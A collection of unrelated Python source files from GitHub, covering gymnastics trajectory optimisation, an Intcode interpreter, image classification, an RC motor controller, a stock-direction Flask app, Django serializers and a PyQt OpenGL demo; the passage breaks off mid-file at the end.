constraints.add(ConstraintFcn.SUPERIMPOSE_MARKERS, node=Node.ALL_SHOOTING, min_bound=-.1, max_bound=.1,
first_marker='MidMainD', second_marker='CibleMainD', phase=1)
constraints.add(ConstraintFcn.TIME_CONSTRAINT, node=Node.END, min_bound=1e-4, max_bound=1.5, phase=1)
constraints.add(ConstraintFcn.TIME_CONSTRAINT, node=Node.END, min_bound=1e-4, max_bound=0.7, phase=3)
constraints.add(ConstraintFcn.TIME_CONSTRAINT, node=Node.END, min_bound=1e-4, max_bound=0.5, phase=4)
return OptimalControlProgram(
biorbd_model,
dynamics,
n_shooting,
[final_time / len(biorbd_model)] * len(biorbd_model),
x_init=x_init,
u_init=u_init,
x_bounds=x_bounds,
u_bounds=u_bounds,
objective_functions=objective_functions,
constraints=constraints,
n_threads=5,
)
def construct_filepath(biorbd_model_path, nb_twist, seed):
    """Build the base result-file name for one (athlete, stunt, seed) run.

    The stunt name is looked up from the number of half-twists, the athlete
    name is the model file name without its '.bioMod' extension, and the seed
    is appended last: e.g. 'Sarah_vrille_et_demi_0'.
    """
    stunt_names = {3: "vrille_et_demi", 5: "double_vrille_et_demi", 7: "triple_vrille_et_demi"}
    model_file = biorbd_model_path.split('/')[-1]
    athlete = model_file.removesuffix('.bioMod')
    return f"{athlete}_{stunt_names[nb_twist]}_{seed}"
def save_results(sol: Solution,
                 *combinatorial_parameters,
                 **extra_parameter):
    """
    Post-optimization callback: pickle the states/controls of one solved ocp.

    Parameters
    ----------
    sol: Solution
        The solution to the ocp at the current pool.
    combinatorial_parameters:
        (biorbd_model_path, nb_twist, seed) for this multi-start run.
    extra_parameter:
        Must contain 'save_folder', the directory where the .pkl is written.
    """
    # Unpack the run parameters. The original body read biorbd_model_path,
    # nb_twist, seed, athlete, stunt and save_folder as undefined free names,
    # which raised NameError as soon as a solve finished.
    biorbd_model_path, nb_twist, seed = combinatorial_parameters
    save_folder = extra_parameter["save_folder"]
    stunts = {3: "vrille_et_demi", 5: "double_vrille_et_demi", 7: "triple_vrille_et_demi"}
    stunt = stunts[nb_twist]
    athlete = biorbd_model_path.split('/')[-1].removesuffix('.bioMod')
    title_before_solve = construct_filepath(biorbd_model_path, nb_twist, seed)
    convergence = sol.status  # IPOPT status: 0 means the solver converged
    # Collect per-phase trajectories so the pickle is self-contained.
    dict_state = {}
    q = []
    qdot = []
    tau = []
    for phase in range(len(sol.states)):
        q.append(sol.states[phase]['q'])
        qdot.append(sol.states[phase]['qdot'])
        tau.append(sol.controls[phase]['qddot_joints'])
    dict_state['q'] = q
    dict_state['qdot'] = qdot
    dict_state['tau'] = tau
    # Drop the ocp before pickling the solution (presumably too heavy or not
    # picklable — the original deletes it too; confirm against bioptim docs).
    del sol.ocp
    dict_state['sol'] = sol
    if convergence == 0:
        convergence = 'CVG'
        print(f'{athlete} doing {stunt} converge')
    else:
        convergence = 'DVG'
        print(f'{athlete} doing {stunt} doesn t converge')
    if save_folder:
        # File name encodes athlete, stunt, seed and convergence status.
        with open(f'{save_folder}/{title_before_solve}_{convergence}.pkl', "wb") as file:
            pickle.dump(dict_state, file)
    else:
        raise RuntimeError(f"This folder {save_folder} does not exist")
def should_solve(*combinatorial_parameters, **extra_parameters):
    """
    Return True when this combination has not been solved yet.

    save_results writes files named f"{title}_{CVG|DVG}.pkl", so the bare
    title is never literally present in the folder listing; the original
    equality test therefore always returned True and every combination was
    re-solved. Matching on the file-name prefix fixes the skip logic.
    """
    biorbd_model_path, nb_twist, seed = combinatorial_parameters
    save_folder = extra_parameters["save_folder"]
    file_prefix = construct_filepath(biorbd_model_path, nb_twist, seed)
    already_done_filenames = os.listdir(f"{save_folder}")
    return not any(name.startswith(file_prefix) for name in already_done_filenames)
def prepare_multi_start(
    combinatorial_parameters: dict[tuple,...],
    save_folder: str = None,
    n_pools: int = 6
) -> MultiStart:
    """
    Build the MultiStart driver: one ocp is prepared and solved per
    combination of the values in `combinatorial_parameters`, combinations
    whose result file already exists are skipped (should_solve), and each
    solution is pickled into `save_folder` (save_results).
    """
    return MultiStart(
        combinatorial_parameters=combinatorial_parameters,
        prepare_ocp_callback=prepare_ocp,
        post_optimization_callback=(save_results, {'save_folder': save_folder}),
        should_solve_callback=(should_solve, {'save_folder': save_folder}),
        solver=Solver.IPOPT(show_online_optim=False),  # You cannot use show_online_optim with multi-start
        n_pools=n_pools,
    )
def main():
    """
    Prepares and solves an ocp for a 803< (double somersault with twists).
    One solve is launched per (athlete, number of half-twists, seed) triple.
    """
    # 10 random initial-guess seeds per combination
    seed = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
    # number of half-twists: 3 = vrille et demie, 5 = double vrille et demie
    nb_twist = [3, 5]
    athletes = [
        # "AdCh",
        # "AlAd",
        # "AuJo",
        # "Benjamin",
        # "ElMe",
        # "EvZl",
        # "FeBl",
        # "JeCh",
        # "KaFu",
        # "KaMi",
        # "LaDe",
        # "MaCu",
        # "MaJa",
        # "OlGa",
        "Sarah",
        # "SoMe",
        # "WeEm",
        # "ZoTs"
    ]
    all_paths = []
    for athlete in athletes :
        path = f'{athlete}'+'.bioMod'
        biorbd_model_path = "Models/Models_Lisa/" + f'{path}'
        all_paths.append(biorbd_model_path)
    # NOTE(review): the key here is 'bio_model_path' while the callbacks
    # (should_solve, save_results) and construct_filepath all unpack/use
    # 'biorbd_model_path' — confirm this matches prepare_ocp's parameter name.
    combinatorial_parameters = {'bio_model_path': all_paths,
                                'nb_twist': nb_twist,
                                'seed': seed}
    # Output directory for the pickled results; must already exist on disk.
    save_folder = "Multistart_double_vrille"
    multi_start = prepare_multi_start(combinatorial_parameters=combinatorial_parameters, save_folder=save_folder, n_pools=6)
    # Overrides the solver set inside prepare_multi_start.
    multi_start.solver = Solver.IPOPT(show_online_optim=False, show_options=dict(show_bounds=False))
    #if Mod.with_hsl:
    multi_start.solver.set_linear_solver('ma57')
    #else:
    #    print("Not using ma57")
    multi_start.solver.set_maximum_iterations(3000)
    multi_start.solver.set_convergence_tolerance(1e-4)
    #multi_start.solver.set_print_level(0)
    multi_start.solve()
    #sol.graphs(show_bounds=True, show_now=False, save_path=f'{folder}/{athlete}')
if __name__ == "__main__":
    main()
| EveCharbie/AnthropoImpactOnTech | Tech_opt_MultiStart.py | Tech_opt_MultiStart.py | py | 34,211 | python | en | code | 1 | github-code | 36 |
class PointV2:
    """A point in the two-dimensional plane."""

    def __init__(self, x: float, y: float) -> None:
        """Store the x and y coordinates as given."""
        self.x = x
        self.y = y

    def distance_to(self, other: "PointV2") -> float:
        """Return the Euclidean distance between this point and ``other``."""
        delta_x = self.x - other.x
        delta_y = self.y - other.y
        return (delta_x ** 2 + delta_y ** 2) ** 0.5
# No runtime validation happens here: string coordinates are stored as-is
# despite the float annotations (p1.distance_to would then fail on str - str).
# Presumably intentional for the tutorial, to contrast with pydantic models
# that would coerce/reject these — confirm against the lesson material.
p1 = PointV2(x="5", y="7")
p2 = PointV2(x=5, y=7)
| adonath/scipy-2023-pydantic-tutorial | notebooks/my-script.py | my-script.py | py | 497 | python | en | code | 10 | github-code | 36 |
12010296738 | #! /usr/bin/env python
import sys
import os
# A few module-level variables, because closures are an easy way to share
# state.
#
# Would be more modular to pass this to each of them. Oh well.
program = None
debug = False
instruction_index = 0
def get_param_value(param):
    """Resolve an instruction parameter to its value.

    Mode 0 is position mode (the value is an address into the program);
    any other mode is immediate mode (the value is used directly).
    """
    # The original compared with `is 0`, which tests object identity and only
    # works because CPython caches small ints; it also emits a SyntaxWarning
    # on Python 3.8+. Value equality is the correct test.
    return program[param['value']] if param['mode'] == 0 else param['value']
# TODO Abstract the operation of running an instruction? The ones that use two
# values look awful similar, and then they could share debugging info.
def add_instruction(left_param, right_param, output_param):
    """Opcode 1: add the two resolved inputs, store at the output address."""
    lhs = get_param_value(left_param)
    rhs = get_param_value(right_param)
    program[output_param['value']] = lhs + rhs
    if debug:
        print('Left value', lhs,
              'right value', rhs,
              'result', program[output_param['value']])
def multiply_instruction(left_param, right_param, output_param):
    """Opcode 2: multiply the two resolved inputs, store at the output address."""
    left_value = get_param_value(left_param)
    right_value = get_param_value(right_param)
    program[output_param['value']] = left_value * right_value
    if debug:
        # Mirror add_instruction's debug format; the original printed only the
        # bare result, which made traces of the two ops inconsistent.
        print('Left value',
              left_value,
              'right value',
              right_value,
              'result',
              program[output_param['value']])
def store_instruction(param):
    """Opcode 3: read an integer from stdin and store it at the param's address."""
    value = input('>')
    program[param['value']] = int(value)
def output_instruction(param):
    """Opcode 4: print the resolved value of the single parameter."""
    print('Output', get_param_value(param))
def jump_if_true_instruction(test_param, jump_param):
    """Opcode 5: if the test value is non-zero, jump to the target address."""
    global instruction_index
    if get_param_value(test_param) != 0:
        instruction_index = get_param_value(jump_param)
def jump_if_false_instruction(test_param, jump_param):
    """Opcode 6: if the test value is zero, jump to the target address."""
    global instruction_index
    if get_param_value(test_param) == 0:
        instruction_index = get_param_value(jump_param)
def less_than_instruction(left_param, right_param, output_param):
    """Opcode 7: store 1 at the output address when left < right, else 0."""
    lhs = get_param_value(left_param)
    rhs = get_param_value(right_param)
    program[output_param['value']] = 1 if lhs < rhs else 0
def equals_instruction(left_param, right_param, output_param):
    """Opcode 8: store 1 at the output address when left == right, else 0."""
    lhs = get_param_value(left_param)
    rhs = get_param_value(right_param)
    program[output_param['value']] = 1 if lhs == rhs else 0
def noop_instruction():
    """Opcode 99 (halt): no work — the run loop detects 99 before dispatching."""
    pass
# Dispatch table: opcode -> handler function and its parameter count.
# TODO: infer num_params from the handler signatures (DRYer); the explicit
# table works for now.
opcodes = {
    1: {
        'function': add_instruction,
        'num_params': 3
    },
    2: {
        'function': multiply_instruction,
        'num_params': 3
    },
    3: {
        'function': store_instruction,
        'num_params': 1
    },
    4: {
        'function': output_instruction,
        'num_params': 1
    },
    5: {
        'function': jump_if_true_instruction,
        'num_params': 2
    },
    6: {
        'function': jump_if_false_instruction,
        'num_params': 2
    },
    7: {
        'function': less_than_instruction,
        'num_params': 3
    },
    8: {
        'function': equals_instruction,
        'num_params': 3
    },
    # 99 (halt) is intercepted by the run loop; this entry is never dispatched.
    99: {
        'function': noop_instruction,
        'num_params': 0
    }
}
def run_intcode_program(input_path, debug=False):
    """Load the comma-separated intcode program at ``input_path`` and run it.

    The program memory and instruction pointer live in module-level globals
    because the opcode handlers share them; this function (re)initializes and
    drives that state until a halt instruction (99) is reached.
    """
    global program, instruction_index
    # 'with' closes the file; the original leaked the open file handle.
    with open(input_path, 'r') as program_file:
        program = [int(x) for x in program_file.read().split(',')]
    # Start execution from the top for each freshly loaded program.
    instruction_index = 0
    halted = False
    while not halted:
        cur_instruction_address = instruction_index
        # Instruction encoding: last two digits are the opcode, the (up to
        # three) digits before them are per-parameter modes, read right to
        # left. Reversing makes modes[i] line up with params[i].
        opcode_string = str(program[instruction_index]).zfill(5)
        opcode = int(opcode_string[-2:])
        modes = [int(char) for char in opcode_string[:-2]]
        modes.reverse()
        if opcode == 99:
            halted = True
            print('Halt instruction reached')
            break
        if debug:
            print('Instruction #:',
                  instruction_index,
                  'Instruction',
                  program[instruction_index],
                  'opcode',
                  opcode_string,
                  'modes',
                  modes)
        num_params = opcodes[opcode]['num_params']
        params = program[instruction_index + 1 : instruction_index + 1 + num_params]
        if debug:
            print('Params: ' + str(num_params) + ', ' + str(params))
        params = [{'mode': modes[i], 'value': param}
                  for i, param in enumerate(params)]
        operator_function = opcodes[opcode]['function']
        operator_function(*params)
        if cur_instruction_address == instruction_index:
            # No jump was performed, so advance past this instruction.
            instruction_index += num_params + 1
if __name__ == '__main__':
    # Setting DEBUG (any value) in the environment turns on instruction tracing.
    if 'DEBUG' in os.environ.keys():
        debug = True
    # argv[1] is the path to the intcode program file.
    run_intcode_program(sys.argv[1], debug)
| NateEag/advent-of-code-solutions | 2019/day-5/solution.py | solution.py | py | 5,561 | python | en | code | 0 | github-code | 36 |
from google.cloud import vision
# 'with' runs the block and then closes the file automatically
# 'rb' = read in binary mode (for non-text data, mainly images and video)
# open road.jpg and read its raw bytes
with open('./road.jpg', 'rb') as image_file:
    content = image_file.read()
# wrap the bytes in an image object the Vision API can work with
image = vision.Image(content=content)
# annotation = the work of tagging data of any kind (text, audio, images, ...)
# client = the object that talks to the service on our behalf
# create an ImageAnnotatorClient instance (uses default GCP credentials)
annotater_client = vision.ImageAnnotatorClient()
response_data = annotater_client.label_detection(image=image)
labels = response_data.label_annotations
# print each detected label with its confidence score as a percentage
print('----RESULT----')
for label in labels:
    print(label.description, ':', round(label.score * 100, 2), '%')
print('----RESULT----')
| yuuki-1227/vision-ai-test | index.py | index.py | py | 916 | python | ja | code | 0 | github-code | 36 |
32033427500 | # Example using PWM to fade an LED.
import time
from machine import Pin, PWM
A1 = PWM(Pin(0))  # left motor driver input 1 (presumably an H-bridge — confirm wiring)
A2 = PWM(Pin(1))  # left motor driver input 2
B1 = PWM(Pin(2))  # right motor driver input 1
B2 = PWM(Pin(3))  # right motor driver input 2
steeringPin = Pin(7)  # RC receiver steering channel (PWM input)
throttlePin = Pin(6)  # RC receiver throttle channel (PWM input)
# motor speed commands range from -255 (full reverse) to +255 (full forward)
def leftControl(speed):
    """Drive the left motor at `speed` in [-255, 255].

    Negative values reverse the motor by swapping which driver input carries
    the PWM duty. duty_u16 expects 0..65535, hence the * 256 scaling.
    """
    # Clamp to the valid command range in one idiomatic expression.
    speed = max(-255, min(255, int(speed)))
    print ("Left " + str(speed))
    if speed < 0:
        A1.duty_u16(0)
        A2.duty_u16(abs(speed) * 256)
    else:
        A1.duty_u16(abs(speed) * 256)
        A2.duty_u16(0)
def rightControl(speed):
    """Drive the right motor at `speed` in [-255, 255].

    Negative values reverse the motor by swapping which driver input carries
    the PWM duty. duty_u16 expects 0..65535, hence the * 256 scaling.
    """
    # Clamp to the valid command range in one idiomatic expression.
    speed = max(-255, min(255, int(speed)))
    print ("Right " + str(speed))
    if speed < 0:
        B1.duty_u16(0)
        B2.duty_u16(abs(speed) * 256)
    else:
        B1.duty_u16(abs(speed) * 256)
        B2.duty_u16(0)
def getPulseWidth(pin):
    """Measure the width in microseconds of the next high pulse on an RC input.

    Busy-waits for the rising edge, then times until the falling edge.
    Widths within 10 us of the 1500 us RC neutral point are snapped to
    exactly 1500 to suppress receiver jitter around stick center.
    """
    # wait out the current low period (until the rising edge)
    while pin.value() == 0:
        pass
    start = time.ticks_us()
    # wait for the falling edge
    while pin.value() == 1:
        pass
    end = time.ticks_us()
    # ticks_diff is the wraparound-safe way to subtract MicroPython tick
    # values; plain `end - start` yields a huge bogus width whenever
    # ticks_us wraps during the pulse.
    duration = time.ticks_diff(end, start)
    if duration > 1490 and duration < 1510:
        duration = 1500
    return duration
# Start with both motors stopped.
leftControl(0)
rightControl(0)
# Main loop: read throttle and steering pulses from the RC receiver and mix
# them into differential (tank-style) left/right motor commands.
while True:
    steering = 0
    throttlePulseWidth = getPulseWidth(throttlePin)
    # Map the ~1000-2000 us RC pulse to roughly -250..+250 (1500 us = neutral).
    throttle = (float(throttlePulseWidth)-1500) / 2
    steeringPulseWidth = getPulseWidth(steeringPin)
    steering = (float(steeringPulseWidth) - 1500) / 2
    print ("Throttle " + str(throttle))
    print ("Steering " + str(steering))
    # NOTE(review): `total` is computed but never used — candidate for removal.
    total = throttle + steering
    # Differential mix: steering slows one side and speeds the other.
    left = throttle
    right = throttle
    left = left - steering
    right = right + steering
    leftControl(left)
    rightControl(right)
25170664533 | import gspread
import pandas as pd
import numpy as np
from oauth2client.service_account import ServiceAccountCredentials
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, confusion_matrix
from flask import Flask, render_template
from datetime import datetime, timedelta
def run_script():
    """Fetch S&P 500 data from a Google Sheet, train a direction classifier
    on the last 60 days, and return its metrics plus the next-day prediction
    confidence for the most recent data point."""
    # Authenticate and open the Google Sheet (requires the service-account
    # JSON key file next to this script)
    scope = ['https://www.googleapis.com/auth/spreadsheets', 'https://www.googleapis.com/auth/drive']
    creds = ServiceAccountCredentials.from_json_keyfile_name('sp500-mes-06736c615696.json', scope)
    client = gspread.authorize(creds)
    sheet = client.open('SP500').sheet1
    # Get the data from the sheet
    data = sheet.get_all_records()
    # Convert the data to a pandas DataFrame
    df = pd.DataFrame(data)
    # Convert the 'Date' column to a datetime object
    df['Date'] = pd.to_datetime(df['Date'])
    # Calculate the date 60 days before today
    start_date = datetime.now() - timedelta(days=60)
    # Filter the DataFrame to include only the last 60 days of data
    df = df[df['Date'] >= start_date]
    # Replace '.' with NaN and drop those rows ('.' is presumably the sheet's
    # missing-value placeholder — confirm against the data source)
    df = df.replace('.', np.nan)
    df = df.dropna()
    # Calculate daily returns
    df['Return'] = df['SP500'].pct_change()
    # Define a function to label the market direction: up (+1), down (-1),
    # or flat (0) within a +/-0.1% band
    def label_market_direction(return_value):
        if return_value > 0.001:
            return 1
        elif return_value < -0.001:
            return -1
        else:
            return 0
    # Create a new column with the market direction labels
    df['Direction'] = df['Return'].apply(label_market_direction)
    # Shift the 'Direction' column up by one so each row's target is the
    # NEXT day's direction
    df['Direction'] = df['Direction'].shift(-1)
    # Drop rows with missing values (the last row's shifted target is NaN)
    df = df.dropna()
    # Split the data into features (X) and target (y) variables
    X = df[['SP500', 'Return']]
    y = df['Direction']
    # NOTE(review): train_test_split shuffles by default, so for this
    # time-ordered series the test set interleaves with training days —
    # consider a chronological split to avoid look-ahead bias.
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
    # Train a RandomForestClassifier
    model = RandomForestClassifier(n_estimators=100, random_state=42)
    model.fit(X_train, y_train)
    # Predict the market direction on the test set
    y_pred = model.predict(X_test)
    # Calculate the accuracy, precision, recall, and F1-score of the model
    accuracy = accuracy_score(y_test, y_pred)
    precision = precision_score(y_test, y_pred, average='weighted')
    recall = recall_score(y_test, y_pred, average='weighted')
    f1 = f1_score(y_test, y_pred, average='weighted')
    # Compute the confusion matrix (transposed into column tuples for the template)
    confusion = confusion_matrix(y_test, y_pred)
    confusion_list = list(zip(*confusion))
    # Predict the market direction for the last data point
    # NOTE(review): last_direction_prediction is never used — only the class
    # probabilities below are returned
    last_data_point = X.iloc[-1].values.reshape(1, -1)
    last_direction_prediction = model.predict(last_data_point)
    # Get the class probabilities for the last data point
    confidence_values = model.predict_proba(last_data_point)
    return {
        "accuracy": accuracy,
        "precision": precision,
        "recall": recall,
        "f1_score": f1,
        "confusion_matrix": confusion_list,
        "confidence_values": confidence_values
    }
app = Flask(__name__)
@app.route('/')
def home():
    """Render the dashboard with the latest model metrics and prediction."""
    # Note: this re-fetches the sheet and re-trains the model on every
    # page load, so requests are slow and hit the Sheets API each time.
    results = run_script()
    # Format the metrics as percentage strings for display
    accuracy = "{:.2%}".format(results["accuracy"])
    precision = "{:.2%}".format(results["precision"])
    recall = "{:.2%}".format(results["recall"])
    f1 = "{:.2%}".format(results["f1_score"])
    cm = results["confusion_matrix"]
    confidence_values = results["confidence_values"]
    now = datetime.now()
    today = now.strftime("%B %d, %Y")
    return render_template(
        'index.html',
        title=f'SP500 Prediction for next day, as of {today}',
        accuracy=accuracy,
        precision=precision,
        recall=recall,
        f1=f1,
        confusion_matrix=cm,
        confidence_values=confidence_values
    )
if __name__ == '__main__':
    # Development server only; debug=True must not be used in production.
    app.run(debug=True)
| Big6Ent/Predict_Next_Day_SP500_Direction | sp500_confidence.py | sp500_confidence.py | py | 4,152 | python | en | code | 0 | github-code | 36 |
26490765888 | import base64
from rest_framework import serializers
from categories.models import Categories, Translations, Authorities
from categories.serializers import TranslationsSerializer
from users.models import User
from .models import Documents
def get_predicted_trees():
    """Return (tree_id, name) pairs for active root categories.

    Called at import time (it populates the `predicted_trees` choices in
    DocumentsSerializer's class body), so the database may not be reachable
    yet — e.g. during migrations or collectstatic.
    """
    try:
        return Categories.objects.filter(
            deprecated=False, parent=None, level=0
        ).values_list("tree_id", "name")
    except Exception as e:
        # Deliberate best-effort: fall back to an empty choice list rather
        # than crash the module import when the DB is unavailable.
        return []
class UsersSerializer(serializers.ModelSerializer):
    """Minimal user representation exposing only the username.

    NOTE(review): duplicates UserSerializer further down this module —
    consider keeping a single definition.
    """
    class Meta:
        model = User
        fields = ["username"]
class CategoriesSerializer(serializers.ModelSerializer):
    """Category representation with its Spanish translation attached."""
    # Resolved by get_translation below.
    translation = serializers.SerializerMethodField()
    # NOTE(review): method_name points at "get_authority", but no
    # get_authority method is defined on this serializer, so serializing
    # this field will fail at runtime. Confirm the intended source
    # (Categories.authority?) and add the method.
    authority = serializers.SerializerMethodField(method_name="get_authority")
    class Meta:
        model = Categories
        # MPTT bookkeeping columns are internal; hide them from the API.
        exclude = ["lft", "rght", "level"]
    def get_translation(self, obj):
        """Return the Spanish translation of the category, or None."""
        translation = Translations.objects.filter(category=obj, language="es").first()
        if translation:
            serializer = TranslationsSerializer(translation)
            return serializer.data
        return None
class UserSerializer(serializers.ModelSerializer):
    """Minimal user representation exposing only the username.

    NOTE(review): duplicates UsersSerializer above — consider keeping one.
    """
    class Meta:
        model = User
        fields = ["username"]
class DocumentsSerializer(serializers.ModelSerializer):
    """Document representation: binary blobs travel as base64 strings.

    The pdf payload is only emitted on detail endpoints (see
    to_representation), which also counts the access.
    """
    # PDF content exchanged as base64 text; stored binary on the model.
    pdf = serializers.CharField(
        max_length=None,
        style={"placeholder": "Enter the base64 of the pdf"},
    )
    # Cover image, accepted as base64 on write only (never serialized back).
    img = serializers.CharField(
        max_length=None,
        style={"placeholder": "Enter the base64 of the img"},
        write_only=True,
    )
    category = serializers.SerializerMethodField()
    created_by = serializers.SerializerMethodField()
    updated_by = serializers.SerializerMethodField()
    # Choices are the active root category trees, resolved at import time.
    predicted_trees = serializers.MultipleChoiceField(
        choices=get_predicted_trees(), write_only=True, required=False
    )
    class Meta:
        model = Documents
        fields = "__all__"
        read_only_fields = (
            "created_at",
            "updated_at",
            "created_by",
            "updated_by",
            "num_of_access",
        )
    def get_category(self, obj):
        """Return the document's categories whose authority is enabled, or None."""
        categories = obj.categories.filter(authority__disabled=False)
        if categories:
            serializer = CategoriesSerializer(categories, many=True)
            return serializer.data
        return None
    def get_created_by(self, obj):
        """Return the creating user's username."""
        serializer = UserSerializer(obj.created_by)
        return serializer.data
    def get_updated_by(self, obj):
        """Return the last updating user's username."""
        serializer = UserSerializer(obj.updated_by)
        return serializer.data
    def to_representation(self, instance):
        """Hide the pdf on list views; on detail views (request path ending
        in /<id>/), bump the access counter and inline the pdf as base64."""
        representation = super().to_representation(instance)
        representation["pdf"] = None
        if self.context.get("request") and self.context["request"].path.endswith(
            f"/{instance.id}/"
        ):
            # Counter is bumped via a queryset update (no model save signals).
            Documents.objects.filter(id=instance.id).update(
                num_of_access=instance.num_of_access + 1
            )
            if instance.pdf:
                pdf_base64 = base64.b64encode(instance.pdf).decode("utf-8")
                representation["pdf"] = pdf_base64
        return representation
class DocumentsTextExtractorSerializer(serializers.Serializer):
    """
    Serializer for the DocumentsTextExtractor.
    Converts instances of the DocumentsTextExtractor to JSON and vice versa.
    Attributes:
        title (CharField): The base64 encoded title of the document.
        summary (CharField): The base64 encoded summary of the document.
    """

    # Both fields carry base64-encoded text, not the decoded strings.
    title = serializers.CharField(
        max_length=None, style={"placeholder": "Enter the base64 for the title"}
    )
    summary = serializers.CharField(
        max_length=None, style={"placeholder": "Enter the base64 for the summary"}
    )
| JU4NP1X/teg-backend | documents/serializers.py | serializers.py | py | 3,796 | python | en | code | 1 | github-code | 36 |
35451201459 | import cv2
from pydarknet import Detector, Image
# Load the Darknet (YOLO) network; requires tank.cfg / tank.weights /
# tank.data to be present in the working directory.
net = Detector(bytes("tank.cfg", encoding="utf-8"), bytes("tank.weights", encoding="utf-8"), 0, bytes("tank.data",encoding="utf-8"))
def Detect(path):
    """Run tank detection on every frame of the video at *path*.

    Each frame is passed through the module-level Darknet `net`; detections
    are drawn as labelled rectangles and shown in an OpenCV window. Press
    'q' to stop early. The capture is always released on exit.
    """
    vidObj = cv2.VideoCapture(path)
    count = 0
    try:
        while True:
            success, image = vidObj.read()
            if not success:
                # End of stream (or read error): the old code fell through
                # and passed a None frame to Image(), crashing here.
                break
            img_darknet = Image(image)
            results = net.detect(img_darknet)
            for cat, score, bounds in results:
                # bounds are centre-based (x, y, width, height).
                x, y, w, h = bounds
                cv2.rectangle(image, (int(x - w / 2), int(y - h / 2)), (int(x + w / 2), int(y + h / 2)), (255, 0, 0), thickness=2)
                cv2.putText(image,str(cat.decode("utf-8")),(int(x),int(y)),cv2.FONT_HERSHEY_COMPLEX,1,(255,255,0))
            cv2.imshow("Detected Tank", image)
            if cv2.waitKey(25) & 0xFF == ord('q'):
                break
            count += 1
    finally:
        # Release the capture and close the preview window in all cases.
        vidObj.release()
        cv2.destroyAllWindows()
if __name__ == '__main__':
    #Detect(path to the surveillance video)
    # Run detection on the bundled sample clip.
    Detect("test.mp4")
| wisekrack/BattleTankDown | tankLocFromSurveillanceVideo.py | tankLocFromSurveillanceVideo.py | py | 958 | python | en | code | 1 | github-code | 36 |
29997839939 | from OpenGL.GL import *
from OpenGL.GLU import *
import sys
#from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QOpenGLWidget
from PyQt5.QtWidgets import QOpenGLWidget, QApplication, QMainWindow, QLabel, QLineEdit, QVBoxLayout, QWidget
from PyQt5.QtWidgets import QSlider
from PyQt5.QtCore import *
class MyGLWidget(QOpenGLWidget):
    """OpenGL widget drawing a single triangle whose color (r, g, b)
    is driven by the three sliders in MyWindow."""

    def __init__(self, parent=None):
        super(MyGLWidget, self).__init__(parent)
        self.r = self.g = self.b = 0.0

    def initializeGL(self):
        # Initialize GL state once, before any drawing takes place.
        glClearColor(0.8, 0.8, 0.6, 1.0)

    def resizeGL(self, width, height):
        # Configure the camera projection here (identity = default clip box).
        glMatrixMode(GL_PROJECTION)
        glLoadIdentity()

    def paintGL(self):
        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
        glMatrixMode(GL_MODELVIEW)
        glLoadIdentity()

        # Draw the object using the current color and a triangle primitive.
        glColor3f(self.r, self.g, self.b)
        glBegin(GL_TRIANGLES)
        glVertex3fv([-1.0, 0.0, 0.0])
        glVertex3fv([ 1.0, 0.0, 0.0])
        glVertex3fv([ 0.0, 1.0, 0.0])
        glEnd()

        # Flush the rendered framebuffer to the screen.
        glFlush()

    # Slider callbacks: val/99 maps the default QSlider range 0..99 to
    # the GL color range 0..1 -- assumes the sliders keep default range.
    def setR(self, val):
        self.r = val/99
        self.update()

    def setG(self, val):
        self.g = val/99
        self.update()

    def setB(self, val):
        self.b = val/99
        self.update()
class MyWindow(QMainWindow):
    """Main window: a GL widget on top of three RGB color sliders."""

    def __init__(self, title = ''):
        QMainWindow.__init__(self) # call the init for the parent class

        self.setWindowTitle(title)
        self.glWidget = MyGLWidget()

        ### GUI layout setup
        gui_layout = QVBoxLayout()
        central_widget = QWidget()
        central_widget.setLayout(gui_layout)
        self.setCentralWidget(central_widget)
        gui_layout.addWidget(self.glWidget)

        # One horizontal slider per color channel, wired to the GL widget.
        sliderX = QSlider(Qt.Horizontal)
        sliderX.valueChanged.connect(lambda val: self.glWidget.setR(val))
        sliderY = QSlider(Qt.Horizontal)
        sliderY.valueChanged.connect(lambda val: self.glWidget.setG(val))
        sliderZ = QSlider(Qt.Horizontal)
        sliderZ.valueChanged.connect(lambda val: self.glWidget.setB(val))
        gui_layout.addWidget(sliderX)
        gui_layout.addWidget(sliderY)
        gui_layout.addWidget(sliderZ)
def main(argv = []):
    """Create the Qt application, show the demo window and run the event loop."""
    qt_app = QApplication(argv)
    demo = MyWindow('GL with Qt Widgets')
    demo.setFixedSize(600, 600)
    demo.show()
    sys.exit(qt_app.exec_())

if __name__ == '__main__':
    main(sys.argv)
| dknife/2021Graphics | Source/01_Windowing/04_GLwQtWidgets.py | 04_GLwQtWidgets.py | py | 2,613 | python | en | code | 2 | github-code | 36 |
28886974693 | import os
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing.image import img_to_array, load_img
from tqdm import tqdm
import json
def preprocess_image(image_path, target_size):
    """Load an image from disk, resize it to *target_size*, scale pixel
    values into [0, 1] and prepend a batch dimension of size 1."""
    pil_image = load_img(image_path, target_size=target_size)
    batch = np.expand_dims(img_to_array(pil_image), axis=0)
    return batch / 255.0
def classify_images(model_path, image_dir, target_size, output_json):
    """Classify every .jpg in *image_dir* with the Keras model at *model_path*
    and write [{"image_id": ..., "lesion_type": ...}, ...] to *output_json*.

    The index -> label mapping below must match the class order used when
    the model was trained -- TODO confirm against the training pipeline.
    """
    model = load_model(model_path)
    results = []
    # HAM10000-style skin-lesion class labels, keyed by model output index.
    lesion_type_mapping = {
        0: "BKL",
        1: "NV",
        2: "DF",
        3: "MEL",
        4: "VASC",
        5: "BCC",
        6: "AKIEC"
    }
    test_image_paths = [os.path.join(image_dir, filename) for filename in os.listdir(image_dir) if filename.endswith('.jpg')]
    # All images are loaded into memory and predicted as one batch.
    test_images = [preprocess_image(image_path, target_size) for image_path in tqdm(test_image_paths)]
    test_images = np.vstack(test_images)
    predictions = model.predict(test_images)
    for image_path, prediction in zip(test_image_paths, predictions):
        predicted_label = lesion_type_mapping[np.argmax(prediction)]
        img_id = os.path.splitext(os.path.basename(image_path))[0]
        results.append({"image_id": img_id, "lesion_type": predicted_label})
    with open(output_json, 'w') as f:
        json.dump(results, f)
if __name__ == "__main__":
    # Absolute paths are machine-specific -- adjust before running elsewhere.
    model_path = '/Users/donika/Desktop/images/model_training/model.h5'
    image_dir = '/Users/donika/Desktop/images/datasets/test'
    target_size = (128, 128)
